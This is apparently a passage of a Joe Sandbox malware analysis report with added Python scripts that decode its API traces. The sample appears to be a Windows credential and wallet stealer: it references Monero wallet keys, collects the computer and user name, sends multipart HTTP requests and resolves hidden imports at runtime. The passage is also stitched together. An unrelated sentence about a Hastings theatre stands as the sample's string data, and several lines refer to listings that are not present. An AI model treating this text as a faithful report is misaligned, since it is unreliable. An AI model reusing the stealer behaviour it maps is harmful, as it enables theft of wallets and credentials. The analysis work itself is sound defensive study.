                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
• String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence repeated 30 times, '$'-separated, one per xref in the Strings list above)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: b74f20d2f61302b12c012e0290fefd96d2e6efcca99b700384ed389eb266ac42
                            • Instruction ID: f4387ca42f5b76094b9d0506edd531343b7bd641169caf41d324a3d590c18d5a
                            • Opcode Fuzzy Hash: b74f20d2f61302b12c012e0290fefd96d2e6efcca99b700384ed389eb266ac42
                            • Instruction Fuzzy Hash: 4341E3616C3788EAE624BFAD88E2E9D7F56DF4774DF587046A810663C2CFB0A5034523

Control-flow Graph (the rendered graph, which colours blocks as executed or not executed, is not included in this extraction; blocks and edges as extracted follow)
                            control_flow_graph 801 eb4880-eb4942 call eca7a0 call eb47b0 call eca740 * 5 InternetOpenA StrCmpCA 816 eb494b-eb494f 801->816 817 eb4944 801->817 818 eb4ecb-eb4ef3 InternetCloseHandle call ecaad0 call eb9ac0 816->818 819 eb4955-eb4acd call ec8b60 call eca920 call eca8a0 call eca800 * 2 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca920 call eca8a0 call eca800 * 2 InternetConnectA 816->819 817->816 829 eb4f32-eb4fa2 call ec8990 * 2 call eca7a0 call eca800 * 8 818->829 830 eb4ef5-eb4f2d call eca820 call eca9b0 call eca8a0 call eca800 818->830 819->818 905 eb4ad3-eb4ad7 819->905 830->829 906 eb4ad9-eb4ae3 905->906 907 eb4ae5 905->907 908 eb4aef-eb4b22 HttpOpenRequestA 906->908 907->908 909 eb4b28-eb4e28 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca9b0 call eca8a0 call eca800 call eca920 call eca8a0 call eca800 call eca740 call eca920 * 2 call eca8a0 call eca800 * 2 call ecaad0 lstrlen call ecaad0 * 2 lstrlen call ecaad0 HttpSendRequestA 908->909 910 eb4ebe-eb4ec5 InternetCloseHandle 908->910 1021 eb4e32-eb4e5c InternetReadFile 909->1021 910->818 1022 eb4e5e-eb4e65 1021->1022 1023 eb4e67-eb4eb9 InternetCloseHandle call eca800 1021->1023 1022->1023 1024 eb4e69-eb4ea7 call eca9b0 call eca8a0 call eca800 1022->1024 1023->910 1024->1021
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EB4915
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00ED0DDB,00000000,?,?,00000000,?,",00000000,?,00A9E390), ref: 00EB4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EB4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EB4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB4E49
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4EC5
                            • HttpOpenRequestA.WININET(00000000,00A9E3F0,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB4B15
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • InternetCloseHandle.WININET(00000000), ref: 00EB4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: the same 14 dump regions (0000000000EB0000 through 0000000001551000) as listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 04ce4327b0827ccc7f73369672c00c0ff58f504e6722a6225fce0253e8422cbf
                            • Instruction ID: ad7bf3efe8566f245cccb0d0390e62e1c6c36a4cd592c1123f6d9e0a02e320ed
                            • Opcode Fuzzy Hash: 04ce4327b0827ccc7f73369672c00c0ff58f504e6722a6225fce0253e8422cbf
                            • Instruction Fuzzy Hash: 6012FB7291021CABDB18EB90DE96FEEB3B8AF54304F5451ADB10672091DF712F4ACB61
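The argument lists in the APIs sections are raw stack values, so the constants that matter for this function (the 00000100 passed to VirtualProtect in the eb45c0 function, the 00400100 flags of HttpOpenRequestA, the service type 00000003 of InternetConnectA, the 000007CF read size) have to be looked up by hand. The decoder below is an added example and is not part of the report or of Joe Sandbox: it parses the report's own "Api.MODULE(args), ref: addr" line format (including the "Part of subcall function" prefix) and names the numeric arguments from the Windows SDK values for the handful of APIs seen above. The sample lines are copied from the lists above; the function and table names are the example's own.

```python
"""Decode the 'APIs' lines of a Joe Sandbox disassembly section: split each line
into API, module, arguments and reference address, then name the numeric
constants the sandbox recorded. Added example, not code from the report or from
Joe Sandbox; the sample lines below are copied from the report text above."""
import re

# "<api>.<MODULE>(<args>), ref: <addr>", optionally prefixed by the subcall note
_LINE_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-F]+): )?"
    r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]+)$")

# winnt.h page protections and wininet.h constants (values from the Windows SDK)
_PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
         0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
         0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
         0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
_INET_FLAGS = {0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00000200: "INTERNET_FLAG_NO_UI",
               0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
               0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00800000: "INTERNET_FLAG_SECURE",
               0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD"}
_INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
_INET_OPEN = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
              3: "INTERNET_OPEN_TYPE_PROXY"}


def _flags(value, table):
    """Split a bitmask into known flag names, keeping unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    if rest:
        names.append("0x%X" % rest)
    return "|".join(names) if names else "0"


def _enum(table):
    return lambda v: table.get(v, "0x%X" % v)


# argument index -> (parameter name, decoder), following the SDK prototypes
_ARG_DECODERS = {
    "VirtualProtect":   {1: ("dwSize", int), 2: ("flNewProtect", lambda v: _flags(v, _PAGE))},
    "InternetOpenA":    {1: ("dwAccessType", _enum(_INET_OPEN))},
    "InternetConnectA": {2: ("nServerPort", int), 5: ("dwService", _enum(_INET_SERVICE))},
    "HttpOpenRequestA": {6: ("dwFlags", lambda v: _flags(v, _INET_FLAGS))},
    "InternetReadFile": {2: ("dwNumberOfBytesToRead", int)},
}


def parse_api_line(line):
    """Return {api, module, args, ref, parent}; parent is the caller address of a
    'Part of subcall function' line, else None."""
    m = _LINE_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError("not an API line: %r" % line)
    parent, api, module, raw_args, ref = m.groups()
    return {"api": api, "module": module, "args": raw_args.split(",") if raw_args else [],
            "ref": int(ref, 16), "parent": int(parent, 16) if parent else None}


def decode_args(rec):
    """Name the arguments known for rec['api']; '?' (a value the sandbox could
    not recover) and string arguments are passed through unchanged."""
    out = {}
    for idx, (name, dec) in _ARG_DECODERS.get(rec["api"], {}).items():
        if idx < len(rec["args"]):
            raw = rec["args"][idx]
            try:
                out[name] = dec(int(raw, 16))
            except ValueError:
                out[name] = raw
    return out


def summarize(lines):
    """Map 'Api@ref' to its decoded arguments for every line in `lines`."""
    return {"%s@%08X" % (r["api"], r["ref"]): decode_args(r)
            for r in map(parse_api_line, lines)}


# copied from the APIs lists of the report above
SAMPLE_LINES = [
    "RtlAllocateHeap.NTDLL(00000000), ref: 00EB460F",
    "VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EB479C",
    "Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6",
    "InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EB4915",
    "InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB4ABA",
    "HttpOpenRequestA.WININET(00000000,00A9E3F0,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB4B15",
    "InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EB4E49",
]

if __name__ == "__main__":
    for key, decoded in summarize(SAMPLE_LINES).items():
        print(key, decoded)
```

Two things the decoded values make visible. The VirtualProtect argument is PAGE_GUARD with no base protection bit, which matches the "Contains functionality to create guard pages" signature in the report header; the SDK documents PAGE_GUARD as a modifier valid only together with a base protection, so read the disassembly at 00EB479C before drawing conclusions from the rendered argument list alone. The WinINet calls describe the request this function sends: INTERNET_OPEN_TYPE_DIRECT, INTERNET_SERVICE_HTTP with no INTERNET_FLAG_SECURE (plain HTTP), keep-alive plus Pragma: no-cache on the request, and a 1999-byte InternetReadFile buffer; the "------" and double-quote strings in this function's Similarity section are what a multipart/form-data body built with lstrcat would need.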
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00EC792F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: the same 14 dump regions (0000000000EB0000 through 0000000001551000) as listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 5333c7e3e0fad5c6ec179d330295a511fea4ad3fbf59e154d306a5bcccb1ca62
                            • Instruction ID: aa7d57175555751b346bb3b4cc1ccd9e159f8a94d6e5eb255cb5e94194d951d3
                            • Opcode Fuzzy Hash: 5333c7e3e0fad5c6ec179d330295a511fea4ad3fbf59e154d306a5bcccb1ca62
                            • Instruction Fuzzy Hash: 7D0186B1A08204EFC750DF94D946FAEBBB8F744B21F10421EF985F3680C37659018BA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EB11B7), ref: 00EC7880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EC789F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: the same 14 dump regions (0000000000EB0000 through 0000000001551000) as listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 638a44fa41076596bbdc96e83120299fa2e7d2ecd1f1e97eccda0b3405e1c4eb
                            • Instruction ID: a3d02c5759a01879a386626104a7c12a49315e6da21e5a3dc309ef41d145e3f4
                            • Opcode Fuzzy Hash: 638a44fa41076596bbdc96e83120299fa2e7d2ecd1f1e97eccda0b3405e1c4eb
                            • Instruction Fuzzy Hash: CDF044B1E44208EFC714DF95DD46FAEBBB8F704721F10015DF645A3680C77915058BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
• Associated: the same 14 dump regions (0000000000EB0000 through 0000000001551000) as listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: fc5d87b164f2fc9683202ffd28efa9b2fe396e1674e2b1ee03c886e5752c2cc3
                            • Instruction ID: 817c7094bd2411c128b4359d16d2b0cfd611ab6db64161a8c32349f85bf8e183
                            • Opcode Fuzzy Hash: fc5d87b164f2fc9683202ffd28efa9b2fe396e1674e2b1ee03c886e5752c2cc3
                            • Instruction Fuzzy Hash: 6ED05E74A0030CDBCB10DFE0D84AADDBB78FB08321F001598D90A73740EA316481CBA5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 ec9c10-ec9c1a 634 eca036-eca0ca LoadLibraryA * 8 633->634 635 ec9c20-eca031 GetProcAddress * 43 633->635 636 eca0cc-eca141 GetProcAddress * 5 634->636 637 eca146-eca14d 634->637 635->634 636->637 638 eca216-eca21d 637->638 639 eca153-eca211 GetProcAddress * 8 637->639 640 eca21f-eca293 GetProcAddress * 5 638->640 641 eca298-eca29f 638->641 639->638 640->641 642 eca2a5-eca332 GetProcAddress * 6 641->642 643 eca337-eca33e 641->643 642->643 644 eca41f-eca426 643->644 645 eca344-eca41a GetProcAddress * 9 643->645 646 eca428-eca49d GetProcAddress * 5 644->646 647 eca4a2-eca4a9 644->647 645->644 646->647 648 eca4dc-eca4e3 647->648 649 eca4ab-eca4d7 GetProcAddress * 2 647->649 650 eca515-eca51c 648->650 651 eca4e5-eca510 GetProcAddress * 2 648->651 649->648 652 eca612-eca619 650->652 653 eca522-eca60d GetProcAddress * 10 650->653 651->650 654 eca67d-eca684 652->654 655 eca61b-eca678 GetProcAddress * 4 652->655 653->652 656 eca69e-eca6a5 654->656 657 eca686-eca699 GetProcAddress 654->657 655->654 658 eca708-eca709 656->658 659 eca6a7-eca703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(76F70000,00A862E0), ref: 00EC9C2D
                            • GetProcAddress.KERNEL32(76F70000,00A86560), ref: 00EC9C45
                            • GetProcAddress.KERNEL32(76F70000,00A98E50), ref: 00EC9C5E
                            • GetProcAddress.KERNEL32(76F70000,00A98C10), ref: 00EC9C76
                            • GetProcAddress.KERNEL32(76F70000,00A9C030), ref: 00EC9C8E
                            • GetProcAddress.KERNEL32(76F70000,00A9C138), ref: 00EC9CA7
                            • GetProcAddress.KERNEL32(76F70000,00A8AEC8), ref: 00EC9CBF
                            • GetProcAddress.KERNEL32(76F70000,00A9C180), ref: 00EC9CD7
                            • GetProcAddress.KERNEL32(76F70000,00A9C2E8), ref: 00EC9CF0
                            • GetProcAddress.KERNEL32(76F70000,00A9C198), ref: 00EC9D08
                            • GetProcAddress.KERNEL32(76F70000,00A9C228), ref: 00EC9D20
                            • GetProcAddress.KERNEL32(76F70000,00A86300), ref: 00EC9D39
                            • GetProcAddress.KERNEL32(76F70000,00A86340), ref: 00EC9D51
                            • GetProcAddress.KERNEL32(76F70000,00A863E0), ref: 00EC9D69
                            • GetProcAddress.KERNEL32(76F70000,00A865A0), ref: 00EC9D82
                            • GetProcAddress.KERNEL32(76F70000,00A9C0C0), ref: 00EC9D9A
                            • GetProcAddress.KERNEL32(76F70000,00A9C2B8), ref: 00EC9DB2
                            • GetProcAddress.KERNEL32(76F70000,00A8B198), ref: 00EC9DCB
                            • GetProcAddress.KERNEL32(76F70000,00A86520), ref: 00EC9DE3
                            • GetProcAddress.KERNEL32(76F70000,00A9C090), ref: 00EC9DFB
                            • GetProcAddress.KERNEL32(76F70000,00A9C048), ref: 00EC9E14
                            • GetProcAddress.KERNEL32(76F70000,00A9C1B0), ref: 00EC9E2C
                            • GetProcAddress.KERNEL32(76F70000,00A9C0A8), ref: 00EC9E44
                            • GetProcAddress.KERNEL32(76F70000,00A86440), ref: 00EC9E5D
                            • GetProcAddress.KERNEL32(76F70000,00A9C1E0), ref: 00EC9E75
                            • GetProcAddress.KERNEL32(76F70000,00A9C240), ref: 00EC9E8D
                            • GetProcAddress.KERNEL32(76F70000,00A9C168), ref: 00EC9EA6
                            • GetProcAddress.KERNEL32(76F70000,00A9C0D8), ref: 00EC9EBE
                            • GetProcAddress.KERNEL32(76F70000,00A9C1C8), ref: 00EC9ED6
                            • GetProcAddress.KERNEL32(76F70000,00A9C258), ref: 00EC9EEF
                            • GetProcAddress.KERNEL32(76F70000,00A9C0F0), ref: 00EC9F07
                            • GetProcAddress.KERNEL32(76F70000,00A9C108), ref: 00EC9F1F
                            • GetProcAddress.KERNEL32(76F70000,00A9C078), ref: 00EC9F38
                            • GetProcAddress.KERNEL32(76F70000,00A9CBC8), ref: 00EC9F50
                            • GetProcAddress.KERNEL32(76F70000,00A9C1F8), ref: 00EC9F68
                            • GetProcAddress.KERNEL32(76F70000,00A9C2A0), ref: 00EC9F81
                            • GetProcAddress.KERNEL32(76F70000,00A86460), ref: 00EC9F99
                            • GetProcAddress.KERNEL32(76F70000,00A9C060), ref: 00EC9FB1
                            • GetProcAddress.KERNEL32(76F70000,00A864E0), ref: 00EC9FCA
                            • GetProcAddress.KERNEL32(76F70000,00A9C210), ref: 00EC9FE2
                            • GetProcAddress.KERNEL32(76F70000,00A9C120), ref: 00EC9FFA
                            • GetProcAddress.KERNEL32(76F70000,00A864A0), ref: 00ECA013
                            • GetProcAddress.KERNEL32(76F70000,00A86500), ref: 00ECA02B
                            • LoadLibraryA.KERNEL32(00A9C300,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA03D
                            • LoadLibraryA.KERNEL32(00A9C270,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA04E
                            • LoadLibraryA.KERNEL32(00A9C2D0,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA060
                            • LoadLibraryA.KERNEL32(00A9C288,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA072
                            • LoadLibraryA.KERNEL32(00A9C318,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA083
                            • LoadLibraryA.KERNEL32(00A9C150,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA095
                            • LoadLibraryA.KERNEL32(00A9C5E8,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA0A7
                            • LoadLibraryA.KERNEL32(00A9C420,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA0B8
                            • GetProcAddress.KERNEL32(75840000,00A865C0), ref: 00ECA0DA
                            • GetProcAddress.KERNEL32(75840000,00A9C558), ref: 00ECA0F2
                            • GetProcAddress.KERNEL32(75840000,00A989A8), ref: 00ECA10A
                            • GetProcAddress.KERNEL32(75840000,00A9C438), ref: 00ECA123
                            • GetProcAddress.KERNEL32(75840000,00A866E0), ref: 00ECA13B
                            • GetProcAddress.KERNEL32(704F0000,00A8B1E8), ref: 00ECA160
                            • GetProcAddress.KERNEL32(704F0000,00A865E0), ref: 00ECA179
                            • GetProcAddress.KERNEL32(704F0000,00A8B058), ref: 00ECA191
                            • GetProcAddress.KERNEL32(704F0000,00A9C450), ref: 00ECA1A9
                            • GetProcAddress.KERNEL32(704F0000,00A9C5B8), ref: 00ECA1C2
                            • GetProcAddress.KERNEL32(704F0000,00A86840), ref: 00ECA1DA
                            • GetProcAddress.KERNEL32(704F0000,00A86740), ref: 00ECA1F2
                            • GetProcAddress.KERNEL32(704F0000,00A9C4F8), ref: 00ECA20B
                            • GetProcAddress.KERNEL32(760B0000,00A86820), ref: 00ECA22C
                            • GetProcAddress.KERNEL32(760B0000,00A866A0), ref: 00ECA244
                            • GetProcAddress.KERNEL32(760B0000,00A9C588), ref: 00ECA25D
                            • GetProcAddress.KERNEL32(760B0000,00A9C510), ref: 00ECA275
                            • GetProcAddress.KERNEL32(760B0000,00A867C0), ref: 00ECA28D
                            • GetProcAddress.KERNEL32(75D30000,00A8B210), ref: 00ECA2B3
                            • GetProcAddress.KERNEL32(75D30000,00A8AFE0), ref: 00ECA2CB
                            • GetProcAddress.KERNEL32(75D30000,00A9C330), ref: 00ECA2E3
                            • GetProcAddress.KERNEL32(75D30000,00A867E0), ref: 00ECA2FC
                            • GetProcAddress.KERNEL32(75D30000,00A868C0), ref: 00ECA314
                            • GetProcAddress.KERNEL32(75D30000,00A8ADB0), ref: 00ECA32C
                            • GetProcAddress.KERNEL32(753A0000,00A9C378), ref: 00ECA352
                            • GetProcAddress.KERNEL32(753A0000,00A86920), ref: 00ECA36A
                            • GetProcAddress.KERNEL32(753A0000,00A98A08), ref: 00ECA382
                            • GetProcAddress.KERNEL32(753A0000,00A9C4B0), ref: 00ECA39B
                            • GetProcAddress.KERNEL32(753A0000,00A9C408), ref: 00ECA3B3
                            • GetProcAddress.KERNEL32(753A0000,00A86760), ref: 00ECA3CB
                            • GetProcAddress.KERNEL32(753A0000,00A86780), ref: 00ECA3E4
                            • GetProcAddress.KERNEL32(753A0000,00A9C3A8), ref: 00ECA3FC
                            • GetProcAddress.KERNEL32(753A0000,00A9C5D0), ref: 00ECA414
                            • GetProcAddress.KERNEL32(76DA0000,00A86700), ref: 00ECA436
                            • GetProcAddress.KERNEL32(76DA0000,00A9C4C8), ref: 00ECA44E
                            • GetProcAddress.KERNEL32(76DA0000,00A9C3C0), ref: 00ECA466
                            • GetProcAddress.KERNEL32(76DA0000,00A9C468), ref: 00ECA47F
                            • GetProcAddress.KERNEL32(76DA0000,00A9C3D8), ref: 00ECA497
                            • GetProcAddress.KERNEL32(77300000,00A86800), ref: 00ECA4B8
                            • GetProcAddress.KERNEL32(77300000,00A86680), ref: 00ECA4D1
                            • GetProcAddress.KERNEL32(767E0000,00A86600), ref: 00ECA4F2
                            • GetProcAddress.KERNEL32(767E0000,00A9C360), ref: 00ECA50A
                            • GetProcAddress.KERNEL32(6F6A0000,00A86860), ref: 00ECA530
                            • GetProcAddress.KERNEL32(6F6A0000,00A86660), ref: 00ECA548
                            • GetProcAddress.KERNEL32(6F6A0000,00A86880), ref: 00ECA560
                            • GetProcAddress.KERNEL32(6F6A0000,00A9C480), ref: 00ECA579
                            • GetProcAddress.KERNEL32(6F6A0000,00A868A0), ref: 00ECA591
                            • GetProcAddress.KERNEL32(6F6A0000,00A866C0), ref: 00ECA5A9
                            • GetProcAddress.KERNEL32(6F6A0000,00A868E0), ref: 00ECA5C2
                            • GetProcAddress.KERNEL32(6F6A0000,00A86900), ref: 00ECA5DA
                            • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 00ECA5F1
                            • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00ECA607
                            • GetProcAddress.KERNEL32(75760000,00A9C3F0), ref: 00ECA629
                            • GetProcAddress.KERNEL32(75760000,00A989C8), ref: 00ECA641
                            • GetProcAddress.KERNEL32(75760000,00A9C498), ref: 00ECA659
                            • GetProcAddress.KERNEL32(75760000,00A9C4E0), ref: 00ECA672
                            • GetProcAddress.KERNEL32(762C0000,00A86940), ref: 00ECA693
                            • GetProcAddress.KERNEL32(6FF10000,00A9C528), ref: 00ECA6B4
                            • GetProcAddress.KERNEL32(6FF10000,00A86960), ref: 00ECA6CD
                            • GetProcAddress.KERNEL32(6FF10000,00A9C618), ref: 00ECA6E5
                            • GetProcAddress.KERNEL32(6FF10000,00A9C540), ref: 00ECA6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 9f50c77409f5d74f8a170e58bd44b04ec70dbdcf436ee6ffe3002b185cf3576d
                            • Instruction ID: 46ac0b2308f81182d734249ffe9c80ba7df571999c4682df2352af1e8311f4f4
                            • Opcode Fuzzy Hash: 9f50c77409f5d74f8a170e58bd44b04ec70dbdcf436ee6ffe3002b185cf3576d
                            • Instruction Fuzzy Hash: D7623AB5700201EFC364DFA9E98AD5637F9F78C641714855EA68EC3A4CD67FA842CB20
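The resolver at 0x00EC9C10 above fetches its imports at runtime and names almost none of them: 102 of the 104 GetProcAddress calls pass the export name through a pointer (a string that only exists decrypted in memory), and only InternetSetOptionA and HttpQueryInfoA appear in clear, both on handle 6F6A0000, which is consistent with that handle being wininet.dll. The first 43 lookups also happen on handle 76F70000 before any LoadLibraryA, so that module was already mapped and its handle obtained in a way this trace does not show. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses trace lines in the report's `Api.MODULE(args), ref: ADDR` layout, groups GetProcAddress calls by module handle, lists the names that were readable, and reports which handles were used before the first LoadLibraryA. The embedded trace is a constructed excerpt of the list above; run on the full list it gives 104 GetProcAddress calls over 13 handles and 8 LoadLibraryA calls.

```python
import re
from collections import Counter

# Joe Sandbox prints each traced call as "Api.MODULE(arg,arg,...), ref: ADDR".
# Arguments are 8-digit hex values (integers or pointers), "?" when the tracer
# could not recover a value, or a readable string when it saw one.
CALL_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
POINTER_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed excerpt of the resolver trace above (function 0x00EC9C10).
RESOLVER_TRACE = """\
GetProcAddress.KERNEL32(76F70000,00A862E0), ref: 00EC9C2D
GetProcAddress.KERNEL32(76F70000,00A86560), ref: 00EC9C45
GetProcAddress.KERNEL32(76F70000,00A98E50), ref: 00EC9C5E
LoadLibraryA.KERNEL32(00A9C300,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA03D
LoadLibraryA.KERNEL32(00A9C270,?,00EC5CA3,00ED0AEB,?,?,?,?,?,?,?,?,?,?,00ED0AEA,00ED0AE3), ref: 00ECA04E
GetProcAddress.KERNEL32(75840000,00A865C0), ref: 00ECA0DA
GetProcAddress.KERNEL32(6F6A0000,00A86860), ref: 00ECA530
GetProcAddress.KERNEL32(6F6A0000,00A86660), ref: 00ECA548
GetProcAddress.KERNEL32(6F6A0000,00A86880), ref: 00ECA560
GetProcAddress.KERNEL32(6F6A0000,00A9C480), ref: 00ECA579
GetProcAddress.KERNEL32(6F6A0000,00A868A0), ref: 00ECA591
GetProcAddress.KERNEL32(6F6A0000,00A866C0), ref: 00ECA5A9
GetProcAddress.KERNEL32(6F6A0000,00A868E0), ref: 00ECA5C2
GetProcAddress.KERNEL32(6F6A0000,00A86900), ref: 00ECA5DA
GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 00ECA5F1
GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 00ECA607
GetProcAddress.KERNEL32(762C0000,00A86940), ref: 00ECA693
"""


def parse_trace(text):
    """One dict per traced call, in report order; 'Part of subcall' lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
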